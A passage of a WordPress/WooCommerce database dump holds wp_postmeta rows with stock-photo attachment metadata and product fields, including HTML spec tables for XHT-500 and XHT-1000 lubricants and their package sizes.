{s:6:"profit";s:1:"2";s:8:"quantity";d:75;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (5885, 699, '_wp_attached_file', '2016/08/shutterstock_157239284.jpg'); 
INSERT INTO `wp_postmeta` VALUES (5886, 699, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4472;s:6:"height";i:3668;s:4:"file";s:34:"2016/08/shutterstock_157239284.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_157239284-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_157239284-800x656.jpg";s:5:"width";i:800;s:6:"height";i:656;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_157239284-768x630.jpg";s:5:"width";i:768;s:6:"height";i:630;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_157239284-1600x1312.jpg";s:5:"width";i:1600;s:6:"height";i:1312;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_157239284-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_157239284-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_157239284-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_157239284-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (5887, 700, '_wp_attached_file', '2016/08/shutterstock_180156275.jpg'); 
INSERT INTO `wp_postmeta` VALUES (5888, 700, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5472;s:6:"height";i:3648;s:4:"file";s:34:"2016/08/shutterstock_180156275.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_180156275-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_180156275-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_180156275-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_180156275-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_180156275-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_180156275-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_180156275-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_180156275-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (5889, 701, '_wp_attached_file', '2016/08/shutterstock_236942140.jpg'); 
INSERT INTO `wp_postmeta` VALUES (5890, 701, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3888;s:6:"height";i:2592;s:4:"file";s:34:"2016/08/shutterstock_236942140.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_236942140-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_236942140-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_236942140-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_236942140-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_236942140-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_236942140-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_236942140-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_236942140-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (5891, 702, '_wp_attached_file', '2016/08/shutterstock_291106055.jpg'); 
INSERT INTO `wp_postmeta` VALUES (5892, 702, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:34:"2016/08/shutterstock_291106055.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_291106055-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_291106055-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_291106055-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_291106055-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_291106055-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_291106055-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_291106055-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_291106055-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (5893, 703, '_wp_attached_file', '2016/08/shutterstock_313168337.jpg'); 
INSERT INTO `wp_postmeta` VALUES (5894, 703, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4272;s:6:"height";i:2848;s:4:"file";s:34:"2016/08/shutterstock_313168337.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_313168337-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_313168337-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_313168337-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_313168337-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_313168337-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_313168337-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_313168337-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_313168337-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (5895, 704, '_wp_attached_file', '2016/08/shutterstock_387235993.jpg'); 
INSERT INTO `wp_postmeta` VALUES (5896, 704, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4787;s:6:"height";i:3648;s:4:"file";s:34:"2016/08/shutterstock_387235993.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_387235993-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_387235993-800x610.jpg";s:5:"width";i:800;s:6:"height";i:610;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_387235993-768x585.jpg";s:5:"width";i:768;s:6:"height";i:585;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_387235993-1600x1219.jpg";s:5:"width";i:1600;s:6:"height";i:1219;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_387235993-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_387235993-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_387235993-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_387235993-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (5897, 705, '_wp_attached_file', '2016/08/shutterstock_424050661.jpg'); 
INSERT INTO `wp_postmeta` VALUES (5898, 705, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:34:"2016/08/shutterstock_424050661.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_424050661-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_424050661-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_424050661-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_424050661-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_424050661-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_424050661-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_424050661-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_424050661-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (5899, 706, '_wp_attached_file', '2016/08/shutterstock_429781711.jpg'); 
INSERT INTO `wp_postmeta` VALUES (5900, 706, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:34:"2016/08/shutterstock_429781711.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_429781711-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_429781711-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_429781711-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_429781711-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_429781711-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_429781711-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_429781711-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_429781711-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (5901, 707, '_edit_lock', '1473777342:2'); 
INSERT INTO `wp_postmeta` VALUES (5902, 707, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (5903, 707, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (5904, 707, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (5905, 707, '312_default_editor', '<table width="667">\r\n<tbody>\r\n<tr>\r\n<td width="202"></td>\r\n<td style="text-align: center;" width="224">XHT-500</td>\r\n<td style="text-align: center;" width="241">XHT-1000</td>\r\n</tr>\r\n<tr>\r\n<td>Estimated Temperature Range</td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>°C</td>\r\n<td style="text-align: center;">(-20-300)</td>\r\n<td style="text-align: center;">(-5-360)</td>\r\n</tr>\r\n<tr>\r\n<td>°F</td>\r\n<td style="text-align: center;">(-4-572)</td>\r\n<td style="text-align: center;">(23-680)</td>\r\n</tr>\r\n<tr>\r\n<td>Base Oil Viscosity, cSt</td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>20°C</td>\r\n<td style="text-align: center;">1712</td>\r\n<td style="text-align: center;">2610</td>\r\n</tr>\r\n<tr>\r\n<td>40°C</td>\r\n<td style="text-align: center;">500</td>\r\n<td style="text-align: center;">738</td>\r\n</tr>\r\n<tr>\r\n<td>100°C</td>\r\n<td style="text-align: center;">47</td>\r\n<td style="text-align: center;">65</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (5906, 707, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;"><strong>Syringe</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="104"><strong>Dab-O-Matic</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Needle Nose Bottle</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Bottle</strong></td>\r\n<td width="104">\r\n<p style="text-align: center;"><strong>Jug</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">.5 kg</td>\r\n<td style="text-align: center;" width="104">1 kg</td>\r\n<td width="104">\r\n<p style="text-align: center;">5 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td width="104">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">-</td>\r\n<td width="104">\r\n<p style="text-align: center;">-</p>\r\n</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">-</p>\r\n</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (5907, 707, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (5908, 707, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (5909, 707, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5910, 707, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5911, 707, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (5912, 707, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5913, 707, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (5914, 707, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (5915, 707, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (5916, 707, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (5917, 707, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (5918, 707, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5919, 707, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5920, 707, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5921, 707, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (5922, 707, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (5923, 707, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5924, 707, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (5925, 707, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5926, 707, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5927, 707, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (5928, 707, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5929, 707, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5930, 707, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (5931, 707, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5932, 707, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5933, 707, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (5934, 707, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (5935, 707, '_product_image_gallery', '374,378,380,377,375,379,381'); 
INSERT INTO `wp_postmeta` VALUES (5936, 708, '_edit_lock', '1473777157:2'); 
INSERT INTO `wp_postmeta` VALUES (5937, 708, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (5938, 708, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (5939, 708, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (5940, 708, '312_default_editor', '<table width="667">\r\n<tbody>\r\n<tr>\r\n<td width="202"></td>\r\n<td style="text-align: center;" width="224">XHT-500</td>\r\n<td style="text-align: center;" width="241">XHT-1000</td>\r\n</tr>\r\n<tr>\r\n<td>Estimated Temperature Range</td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>°C</td>\r\n<td style="text-align: center;">(-20-300)</td>\r\n<td style="text-align: center;">(-5-360)</td>\r\n</tr>\r\n<tr>\r\n<td>°F</td>\r\n<td style="text-align: center;">(-4-572)</td>\r\n<td style="text-align: center;">(23-680)</td>\r\n</tr>\r\n<tr>\r\n<td>Base Oil Viscosity, cSt</td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>20°C</td>\r\n<td style="text-align: center;">1712</td>\r\n<td style="text-align: center;">2610</td>\r\n</tr>\r\n<tr>\r\n<td>40°C</td>\r\n<td style="text-align: center;">500</td>\r\n<td style="text-align: center;">738</td>\r\n</tr>\r\n<tr>\r\n<td>100°C</td>\r\n<td style="text-align: center;">47</td>\r\n<td style="text-align: center;">65</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (5941, 708, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;"><strong>Syringe</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="104"><strong>Dab-O-Matic</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Needle Nose Bottle</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Bottle</strong></td>\r\n<td width="104">\r\n<p style="text-align: center;"><strong>Jug</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">.5 kg</td>\r\n<td style="text-align: center;" width="104">1 kg</td>\r\n<td width="104">\r\n<p style="text-align: center;">5 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td width="104">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">-</td>\r\n<td width="104">\r\n<p style="text-align: center;">-</p>\r\n</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">-</p>\r\n</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (5942, 708, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (5943, 708, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5944, 708, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5945, 708, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (5946, 708, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5947, 708, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (5948, 708, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (5949, 708, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (5950, 708, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (5951, 708, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5952, 708, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5953, 708, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5954, 708, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (5955, 708, '_sale_price_dates_to', ''); 
